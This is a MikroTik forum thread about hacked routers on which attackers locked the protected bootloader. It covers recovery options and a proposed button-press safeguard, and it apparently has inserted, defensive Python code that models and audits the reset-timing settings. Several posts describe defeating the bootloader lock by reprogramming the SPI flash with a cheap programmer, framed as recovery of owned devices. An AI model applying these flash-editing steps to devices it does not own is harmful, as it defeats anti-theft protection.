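        findings.append(f"reformat-hold-button changed to {hold}s")
    if hold_max != baseline["reformat-hold-button-max"]:
        findings.append(f"reformat-hold-button-max changed to {hold_max}s")
    if "pending" in cur:
        findings.append("unconfirmed change pending: " + cur["pending"])
    return findings


def reset_hold_outcome(held_s: float, hold: int, hold_max: int, released: bool = True) -> str:
    """Model of the behaviour rextended measured on 6.47.10: the NAND is formatted
    only when the button is released inside [hold, hold_max] (inclusive); any
    other release time boots normally; a never-released button does not boot."""
    if not released:
        return "no-boot"
    if hold <= held_s <= hold_max:
        return "format"
    return "normal-boot"


if __name__ == "__main__":
    for name, listing in (("confirmed", CONFIRMED), ("pending", PENDING), ("tampered", TAMPERED)):
        print(name, audit(listing, BASELINE) or "OK")
```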
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 5:21 pm

The ransom is still possible; the timing change must also be confirmed...


@Znevna,
please can you test whether, if system-reset is used,
the protected-routerboard settings are lost?
Thanks.
 
msatter
Forum Guru
Forum Guru
Posts: 2912
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 5:35 pm

in next v6 and v7 versions, protected bootloader function will have to be confirmed with press of a button. Nobody who has your password will be able to set it, if he has no physical access to the device.
I want to suggest an extra setting for how to enforce it. Two possibilities, defined on activation:

- allow reuse: a known time documented by Mikrotik to reset the whole router to its factory settings (maintaining the licence for RouterOS)
- locked down: only the owner, knowing the timing, can reuse the router.

The second one is the current implementation and it makes the router unusable in case of theft.

A button press will be required on activation and it looks logical to me to also enforce a button press on deactivation of the protection or on setting a different timing.

Edit: only show the set/max time from the router when being set. On change the new set/max time is shown until a(n) (un)successful set/reboot.
Last edited by msatter on Fri Nov 12, 2021 5:44 pm, edited 1 time in total.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 5:40 pm

For deactivation, when you do /system reset-configuration it must not be needed,
and also if you use a user with full control on a router, it is useless to press a button to disable protected-routerboard.

In my opinion the button must be pressed only:
to set protected-routerboard enabled,
to change any timing on protected-routerboard (when it is enabled).
 
Znevna
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 5:45 pm

/system/reset-configuration does not alter routerboard settings; that includes protected routerboot.
The only thing that changes it is doing a format within the format window that was set; from the example above, keeping it pressed for ~40s after power on.
For some reason netinstall v7 was always flaky: the device boots and does the tftp transfer, but it doesn't show up in netinstall; you have to close netinstall after the tftp transfer finishes and reopen netinstall, then the device shows up and you can hit install on it. Smells like a bug.
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 5:59 pm

In my tests on 6.47.10, when you use the correct reset timing, all values are set to default, including all the various protected-routerboard settings.
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 6:07 pm

It will mean that you must hold the button 60 to 65 seconds, not less and not more, making guesses impossible.

On 6.47.10 it is impossible to set a time difference of less than 10 seconds between reformat-hold-button and reformat-hold-button-max.
warning_pr.png
Last edited by rextended on Fri Nov 12, 2021 6:10 pm, edited 1 time in total.
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 6:07 pm

/system/reset-configuration does not alter routerboard settings, that includes protected routerboot.
Exactly this is what I used for tests on 6.47.10.
 
normis
MikroTik Support
Posts: 26378
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 7:39 pm

If you use a new software version and did not open up your firewall to the whole world, there is no reason to worry about remote attackers.
Also, just don't use the protected bootloader mode. It is only for specific situations where you want to deny reset and recovery.
 
Znevna
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Sat Nov 13, 2021 12:09 am

Someone asks:
Even with the new requirement for the protected bootloader to press a button, someone with bad intentions can still downgrade and .. you know?
 
Jotne
Forum Guru
Posts: 3297
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: Mikrotik router Hacked!!!

Sat Nov 13, 2021 8:22 am

One extra security feature:
to downgrade from newer software, you need to press the button.
To upgrade, it's not needed...
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Sat Nov 13, 2021 10:00 am

Think twice:
RouterOS is full of discovered and undiscovered errors; if you need to downgrade for some reason not discovered before, how do you downgrade devices 200km away?
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Sat Nov 13, 2021 10:03 am

Someone asks:
Even with the new requirement for the protected bootloader to press a button, someone with bad intentions can still downgrade and .. you know?
Like it actually already is: RouterOS can be downgraded, but not past the factory RouterOS,
and RouterBOOT can't be downgraded past the factory RouterBOOT version.
If the new RouterOS upgrades the factory boot code, it is impossible to go back with RouterBOOT,
but RouterOS can be downgraded, and is unable to change protected-routerboot values on the new RouterBOOT.
Last edited by rextended on Sat Nov 13, 2021 10:04 am, edited 1 time in total.
 
Znevna
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Sat Nov 13, 2021 10:03 am

[...]
Hi, we are quite sure because over 15 pcs of routers have the same issue; before that we were using old version 6.3xx, after upgrading to 6.49 the same issue reappeared
All this button-pressing confirmation is because Bob here didn't update his routers in 6 years.
You can add all the security measures you want; Bob is not alone in the world, these Bobs won't update their routers, botnets feed on Bobs' routers, and the next Bob will write on the forum that "he can't recover his MikroTik that he didn't touch in the last 6 years".
All this button-pressing confirmation seems futile.
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Sat Nov 13, 2021 10:07 am

@Znevna, remember: some users do not know the difference between RouterOS and RouterBOOT, and update only RouterOS, leaving only the "factory" RouterBOOT version....
 
Znevna
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Sat Nov 13, 2021 10:10 am

That's not an issue here; the "new (already added in v7?) press button to confirm protected routerboot" is a RouterOS thing: RouterOS validates the change with the press of a button and sets it to enabled, and if it's not confirmed it sets it back to disabled. RouterBOOT has nothing to do with it.
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Sat Nov 13, 2021 10:21 am

v7 cannot enable (button pressed or not) features not present in the RouterBOOT ...
The reset button on startup is a RouterBOOT thing; RouterOS may not even be present.

If the FACTORY RouterBOOT is older than 6.43.7, v7 cannot do anything about successful reuse;
that is why the FACTORY RouterBOOT upgrade was released in the past for the first time,
because prior to 6.43.7, a "bug" made protected-routerboot useless...

https://wiki.mikrotik.com/wiki/Manual:R ... bootloader

viewtopic.php?t=94303#p580430
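A defender-side check of the settings this thread discusses, as an added example (not code from the thread or from MikroTik): it parses the `key: value` lines that `/system routerboard settings print` and `/system routerboard print` produce (all sample values are constructed) and flags protected-routerboot being enabled together with its hold-button window, a window narrower than the 10 s minimum reported above, a factory RouterBOOT older than the 6.43.7 cut-off, and RouterBOOT not upgraded in step with RouterOS.

```python
# Added example: audit RouterOS bootloader-protection state from CLI output.
# Sample values below are constructed, not taken from any real router.
import re
from typing import Dict, List, Tuple

# Constructed sample in the shape of "/system routerboard settings print".
SAMPLE_SETTINGS = """\
       protected-routerboot: enabled
       reformat-hold-button: 35s
   reformat-hold-button-max: 45s
"""
# Constructed sample in the shape of "/system routerboard print".
SAMPLE_ROUTERBOARD = """\
       routerboard: yes
  factory-firmware: 6.42.1
  current-firmware: 6.48.6
  upgrade-firmware: 6.49
"""
MIN_FACTORY_ROUTERBOOT = (6, 43, 7)  # cut-off named in the thread
MIN_WINDOW_S = 10  # smallest gap RouterOS lets you set between the two timings

_LINE = re.compile(r"^\s*([A-Za-z0-9-]+):\s*(.*?)\s*$")
_TIME = re.compile(r"(\d+)([hms])")
_VERSION = re.compile(r"\d+(?:\.\d+)*")


def parse_print(text: str) -> Dict[str, str]:
    """Turn RouterOS 'key: value' print output into a dict."""
    result: Dict[str, str] = {}
    for line in text.splitlines():
        match = _LINE.match(line)
        if match:
            result[match.group(1)] = match.group(2)
    return result


def parse_seconds(value: str) -> int:
    """Convert a RouterOS time such as '45s' or '1m5s' to whole seconds."""
    units = {"h": 3600, "m": 60, "s": 1}
    parts = _TIME.findall(value)
    if not parts or "".join(n + u for n, u in parts) != value:
        raise ValueError(f"unrecognised time value: {value!r}")
    return sum(int(n) * units[u] for n, u in parts)


def version_tuple(value: str) -> Tuple[int, ...]:
    """'6.43.7' -> (6, 43, 7); a suffix such as 'rc1' is ignored."""
    match = _VERSION.match(value)
    if not match:
        raise ValueError(f"unrecognised version: {value!r}")
    return tuple(int(p) for p in match.group(0).split("."))


def audit(settings: Dict[str, str], board: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (code, message) findings for the states the thread discusses."""
    findings: List[Tuple[str, str]] = []
    if settings.get("protected-routerboot") == "enabled":
        low = parse_seconds(settings["reformat-hold-button"])
        high = parse_seconds(settings["reformat-hold-button-max"])
        findings.append(("PROTECTED", f"protected-routerboot enabled: reset and "
                         f"netinstall need the button held {low}-{high}s after "
                         f"power-on; keep that window on record off the device"))
        if high - low < MIN_WINDOW_S:
            findings.append(("NARROW_WINDOW", f"hold window is {high - low}s, "
                             f"below the {MIN_WINDOW_S}s RouterOS refuses to go under"))
    factory = board.get("factory-firmware")
    if factory and version_tuple(factory) < MIN_FACTORY_ROUTERBOOT:
        findings.append(("OLD_FACTORY_BOOT", f"factory RouterBOOT {factory} is "
                         f"older than 6.43.7; apply the factory RouterBOOT upgrade"))
    current, upgrade = board.get("current-firmware"), board.get("upgrade-firmware")
    if current and upgrade and current != upgrade:
        findings.append(("ROUTERBOOT_STALE", f"RouterBOOT {current} running, "
                         f"{upgrade} available: /system routerboard upgrade, then reboot"))
    return findings


if __name__ == "__main__":
    for code, message in audit(parse_print(SAMPLE_SETTINGS),
                               parse_print(SAMPLE_ROUTERBOARD)):
        print(f"[{code}] {message}")
```

Feed it the two print outputs collected from each router in your inventory and keep the reported hold window somewhere other than the router itself.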
 
mkx
Forum Guru
Posts: 11598
Joined: Thu Mar 03, 2016 10:23 pm

Re: Mikrotik router Hacked!!!

Sat Nov 13, 2021 6:24 pm

If FACTORY RouterBOOT are older than 6.43.7, the v7 can not do anything about successfully reuse,

According to current experience, ROS v7 will enter an endless bootloop on gadgets with ancient routerboot versions, and the gadget will be unhackable anyway.
 
anav
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: Mikrotik router Hacked!!!

Sat Nov 13, 2021 11:35 pm

I am a perfect example: I have no clue what you mean by bootloader.
I upgrade the firmware and then upgrade the SYSTEM routerboard, keeping them always in sync...........
I do not know where to find the bootloader or why I would need it.

I don't want my router, if hacked remotely, to no longer be recoverable by netinstall,
SIMPLE>>>>>>>>>>>>>>>>

of course not that it will be hacked but just sayin..........
 
holvoetn
Forum Guru
Posts: 5481
Joined: Tue Apr 13, 2021 2:14 am
Location: Belgium

Re: Mikrotik router Hacked!!!

Sun Nov 14, 2021 12:16 pm

of course not that it will be hacked but just sayin..........
Never say never.
Plenty of people had that same thought.
It would never happen to them, always to others.
 
anav
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: Mikrotik router Hacked!!!

Sun Nov 14, 2021 4:07 pm

Exactly, and thus I don't want the unit in a mode, if hacked, that I cannot recover from.
 
xt22
Frequent Visitor
Posts: 75
Joined: Tue Jul 14, 2015 1:16 pm

Re: Mikrotik router Hacked!!!

Sun Nov 14, 2021 8:24 pm

well, nobody thought ROS would serve the users' credentials file to any unauthenticated remote attacker too.. fortunately this time it was tied to Winbox, so all quality setups had it disabled, but this is not to MikroTik's credit, it is just luck this time. Because no matter what, they made one of the highest-severity vulnerabilities.

MikroTik shouldn't have listened to those whining ISPs, but the button thing will probably work - I'd still rather buy devices without this function.

That is a good point about downgrade
 
anav
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: Mikrotik router Hacked!!!

Sun Nov 14, 2021 8:47 pm

I am not complaining nor want to............. just want to make sure that if something unexpected happens, I can recover vice buy a new unit.
If I need the added functionality and thus the additional risk, that should be an admin's choice, and not a default that those of us have to accept and which we have no control over!!
 
msatter
Forum Guru
Posts: 2912
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mikrotik router Hacked!!!

Sun Nov 14, 2021 10:55 pm

AVM (Fritz!) implemented the push button a long time ago, after settings in routers were changed by hackers to call expensive phone numbers abroad. They received the money spent on those calls.

They acted swiftly after it became known that it happened. Now, if you have a phone-connected box you have to enter the code shown on your screen or press any button on the box.

This goes for every big change you make. You are allowed to switch it off if you feel up to it.

For remote changes over the Internet you need the "Google Authenticator" app for that.

If MikroTik want to see what a home device should do, they should buy a Fritz!box and have a peek. This so as not to invent it all again and pay the price for leaving holes that can be misused.
 
xt22
Frequent Visitor
Posts: 75
Joined: Tue Jul 14, 2015 1:16 pm

Re: Mikrotik router Hacked!!!

Sun Nov 14, 2021 11:09 pm

I AM complaining.. I hate this chance to get my ~$1000 1036s, 354s and all these expensive devices bricked and scrapped because some damn ISPs are whining about people stealing their $35 antennas. If someone stole from you, sue him. I have always thought netinstall is the last fallback that will work no matter what happened to the software; I must say I am disappointed by this function. And no, I haven't been hacked and my devices are properly secured.
 
mducharme
Trainer
Posts: 1777
Joined: Tue Jul 19, 2016 6:45 pm
Location: Vancouver, BC, Canada

Re: Mikrotik router Hacked!!!

Sun Nov 14, 2021 11:14 pm

Perhaps MikroTik could add something in the future that could prevent downgrade to the older versions that allowed setting this without pushing the button?
 
msatter
Forum Guru
Posts: 2912
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mikrotik router Hacked!!!

Sun Nov 14, 2021 11:37 pm

@xt22 it was suggested to make this an optional package. I suggest having this for the higher segment.

For ISPs, produce different firmwares that have the protection built in, with TR-069 built in as well.

A client of an ISP can't change the firmware because of RouterBOOT, and theft does not pay off.

ROS 7.x seems to be becoming a complete package without any choice about packages. Then why not create two versions, one without protection and one with protection. The buyer decides which version is going to be used.
 
mducharme
Trainer
Posts: 1777
Joined: Tue Jul 19, 2016 6:45 pm
Location: Vancouver, BC, Canada

Re: Mikrotik router Hacked!!!

Mon Nov 15, 2021 3:24 am

I disagree about having to make versions with and without protection; it is hard to ensure that that resolves the issue, and it certainly probably doesn't with older versions and the potential threat of a downgrade.

I think it is a feature they can leave in there, but I wonder if they can potentially add something to prevent devices from being downgraded beyond a certain point - say, a special package that gets installed to change the minimum version that the router believes it needs to use in order to work, and the downgrade would fail to anything lower than that. Like the fix_space.npk, it would install and then disappear after fixing the issue. Or, add a button that does the same thing. After a certain amount of time has elapsed, they could just prevent downgrades across the board to versions vulnerable to this.

Such a thing might even be good for other vulnerabilities. "Prevent downgrades below current RouterOS version", in case someone downgrades a router on purpose to make it more vulnerable.
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Mon Nov 15, 2021 10:02 am

Such a package already exists; I have already posted that:
[...]
that is why the FACTORY RouterBOOT upgrade was released in the past for the first time,
because prior to 6.43.7, a "bug" made protected-routerboot useless...
[...]

viewtopic.php?t=94303#p580430

It is not possible to downgrade RouterBOOT or RouterOS prior to the factory version.

Simply release another upgrade for the FACTORY RouterBOOT version that requires the button press to confirm BOTH a timing change and enabling protected-routerboot.
 
anav
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: Mikrotik router Hacked!!!

Mon Nov 15, 2021 12:45 pm

Whatever is done just make sure the nomenclature is clear.

a. VERSION DANGEROUS (all those that may require the ability to make their device remotely changeable on the bootloader, and if compromised the device is garbage)
b. VERSION SAFE (all those that do not want to expose the bootloader to hackers under any circumstance (remotely); netinstall will always recover the device)

SAFE 7.2
Dangerous 7.2

S7.2
D7.2
 
msatter
Forum Guru
Posts: 2912
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mikrotik router Hacked!!!

Mon Nov 15, 2021 1:13 pm

Just an extra: a SecureBoot-supporting version is sufficient, ROS7.1rc6-SB for example.

Edit: ....there is still a chance that a way is found to activate secure boot. I think it is better that the boot code comes in two versions. ROS should detect if the device supports it, and so only one ROS version is needed.
That can still be changed to a secure boot version if the router is hacked. Then the press button on change will avoid that being used after reboot, if this is being misused.

100% assurance is not possible here.
Last edited by msatter on Mon Nov 15, 2021 1:25 pm, edited 1 time in total.
 
mducharme
Trainer
Posts: 1777
Joined: Tue Jul 19, 2016 6:45 pm
Location: Vancouver, BC, Canada

Re: Mikrotik router Hacked!!!

Mon Nov 15, 2021 1:25 pm

Is not possible downgrade RouterBOOT or RouterOS prior to factory version.
This isn't always the case - it is actually sometimes possible to downgrade RouterOS below the factory version (my coworker did it before), but it is not true for RouterBOOT - it is always impossible to downgrade RouterBOOT below the factory version. I'm not sure what rules dictate which downgrades are OK for RouterOS itself.
 
msatter
Forum Guru
Posts: 2912
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mikrotik router Hacked!!!

Mon Nov 15, 2021 1:28 pm

Look at the 5009, it comes with 7.05. The later versions will have 7.09 as default.
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Mon Nov 15, 2021 5:41 pm

Is not possible downgrade RouterBOOT or RouterOS prior to factory version.
This isn't always the case - it is actually sometimes possible to downgrade RouterOS below the factory version (my coworker did it before), but it is not true for RouterBOOT - it is always impossible to downgrade RouterBOOT below the factory version. I'm not sure what rules dictate which downgrades are OK for RouterOS itself.
Again: do not confuse RouterOS with RouterBOOT.

Factory RouterBOOT is readable on /system routerboard
Factory RouterOS (when set, obviously) on /system resources

It is possible to install RouterOS 5.x (yes, 5.x) on a (supported) routerboard that has 6.47.3 as RouterBOOT and Factory Software undefined.

It is possible to install, for example, RouterOS 6.10 on a routerboard that has 6.47.3 as RouterBOOT and Factory Software 6.10 or less (or undefined).

But it is impossible, in the standard way, to set the "current" RouterBOOT version lower than the factory RouterBOOT.
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Mon Nov 15, 2021 6:00 pm

Easy way to remove protection: (solution by @r00t)

[...]
Desolder the SPI flash, change the bytes in the bootloader configuration block that lock the device, and solder it back.
At least it's just an SPI chip, which is not that hard to work with and can be programmed with a cheap CH341A programmer
(just make sure, if you buy one off ebay, to fix it so it's 3.3V, as the default is 5V and that WILL fry your SPI memory!).
[...]

Image

viewtopic.php?f=3&t=176437&p=865575&hilit=600#p865609
 
anav
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: Mikrotik router Hacked!!!

Mon Nov 15, 2021 7:54 pm

I am begging MT not to use Rextended's advice that many of us should start de-soldering our circuit boards.
First of all, my eyes are too old to see things that small and, more importantly, Rextended has told me he will not pay me for a new CCR1009 if I break it. ;-PP

I think our definitions of EASY are different.

Easy way to build a tower???
.......
OIP.jpg
 
r00t
Long time Member
Posts: 674
Joined: Tue Nov 28, 2017 2:14 am

Re: Mikrotik router Hacked!!!

Mon Nov 15, 2021 9:25 pm

You don't have to desolder the SPI chip unless it's faulty; a programming clip does the job quickly:
clip.jpg
Also there are many ways to deal with this problem once you have access to the flash chip:
- find the actual value in seconds in memory, so you know how long you have to press the button
- modify the bootloader configuration or flash contents so it boots from LAN
- replace the bootloader with an old one that doesn't have this functionality
But the first step is always to take a full memory dump, so that in case you do something wrong later it's fully reversible.
Also, if multiple devices were hacked by the same person, it's possible the protected routerboot timeout will be the same on all of them, so dumping just one may do the job.

I'm not saying this is a user-friendly way of fixing this problem for everyone, and I 100% agree there should be some way for MikroTik to make sure protected routerboot can't be enabled by a user without hardware confirmation (the button press method sounds good). Also some devices have BGA flash memory chips, and for these there is no easy access. The boards with SPI chips are the easiest to work with.

If everything fails, at least put the bricked hardware on ebay... someone may be able to fix it or use it for parts. Re-use is always a better option for the environment than recycling...
 
holvoetn
Forum Guru
Posts: 5481
Joined: Tue Apr 13, 2021 2:14 am
Location: Belgium

Re: Mikrotik router Hacked!!!

Mon Nov 15, 2021 9:30 pm

Memories of long gone times seeing such clip again ...
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Mon Nov 15, 2021 11:04 pm

Easy way to build a tower???
The tower generates more money that way than a standard tower... ahahahahah....... :lol:
 
anav
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: Mikrotik router Hacked!!!

Mon Nov 15, 2021 11:43 pm

Easy way to build a tower???
The tower generates more money that way than a standard tower... ahahahahah....... :lol:
Yes, it was architectural stupidity but marketing genius LOL
 
Znevna
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Tue Nov 16, 2021 12:17 am

Looks like RouterOS 7 currently.
 
millenium7
Long time Member
Posts: 539
Joined: Wed Mar 16, 2016 6:12 am

Re: Mikrotik router Hacked!!!

Tue Nov 16, 2021 3:58 am

There is information about Windows malware that knows how to connect to an MT router with the default password and make configuration changes to add it to a botnet.

So admin with no password on the local network is not safe anymore.
Well, this has to be changed by MikroTik anyway, as it will be forbidden to sell devices in the EU from 2024 in the state they are in now (standard default password).
Other manufacturers are already selling devices with a default password printed on a sticker, not derived from the MAC address or serial number.
Some recent "pre-configured" MikroTik devices have this as well, but the password is lost on a factory reset. So that still has to be improved.
This is REALLY bad practice. I hate that they are doing this with the LHG60 products and really, really hope they don't introduce random passwords to devices.

It sounds good in theory but not in practice. Like putting 100 automatic locks on your front door 'sounds' way more secure, until you realize it takes you 2 hours every time you want to go back inside and it just pisses everybody off.
Radios are predominantly installed by field techs and should be accessible for initial config. When they forget to take a photo of the included sticker (or it's blurry/unreadable), remote support cannot log in and set the device up properly. And if the sticker has been lost/damaged and the device is factory reset for any reason, you are completely fk'd and cannot get into it. Meaning someone needs to climb the tower to replace the radio; a 5 minute outage suddenly turns into hours/days and is hugely service impacting.

Now do the same thing to routers everywhere..... we sometimes have to remote in and reconfigure a device for whatever reason. If it is in another city/state/country and we can't get to it............ you see what I mean?
This 'solution' is a bigger problem than the initial problem. Stupid panic reaction to a few edge cases and nobody wanting to accept responsibility, so they blanket the entire industry with a snap reactionary proposal.
 
pe1chl
Forum Guru
Posts: 10223
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mikrotik router Hacked!!!

Tue Nov 16, 2021 11:40 am

I understand what the problem is, and I have faced that thing with AVM equipment (both the knowledge of the password and the need for pressing a button to make certain changes).
But I also see what happens when such measures are not implemented: hundreds of thousands of MikroTik routers forming a botnet. Other manufacturers have used hashing functions to have a predictable password when knowing the MAC address, but it has proven not to be secure.

So you can expect this to be implemented, and you will need to keep an administration of the default passwords of all equipment you have in service.
Of course you should still change the password to something you only know yourself. But as you indicate, you might need the default password after the device has been reset.
 
holvoetn
Forum Guru
Posts: 5481
Joined: Tue Apr 13, 2021 2:14 am
Location: Belgium

Re: Mikrotik router Hacked!!!

Tue Nov 16, 2021 12:14 pm

So you can expect this to be implemented, and you will need to keep an administration of the default passwords of all equipment you have in service.
Of course you should still change the password to something you only know yourself. But as you indicate, you might need the default password after the device has been reset.
That horse left the barn a long time ago.
You have to keep track of all passwords, also default ones, whether you like it or not.
And never leave a default password available for something in service.

It's nowadays never a question IF someone can breach your network but WHEN. If those guys think your environment can be interesting to them, they WILL get in.
Leave default passwords and make it much easier for the perv to do further damage to your devices.
Or not.
 
kuchiii
just joined
Posts: 1
Joined: Fri Dec 24, 2021 5:12 pm

Re: Mikrotik router Hacked!!!

Fri Dec 24, 2021 7:09 pm

In the next v6 and v7 versions, the protected bootloader function will have to be confirmed with a press of a button. Nobody who has your password will be able to set it if he has no physical access to the device.
Hello Normis,
I would like to ask you for help if it is possible. We are a company that provides IT services and we use MikroTik equipment. Unfortunately, we have been the target of an attack on a MikroTik device, which was subsequently encrypted and cannot be logged in to, nor can we perform a classic device reset or Netinstall. Is there any way to save the equipment and put it back into service? Thank you so much.
Sincerely, Martin
 
pe1chl
Forum Guru
Posts: 10223
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mikrotik router Hacked!!!

Sun Dec 26, 2021 12:46 pm

For you it is already too late and you will need the drastic methods shown above...
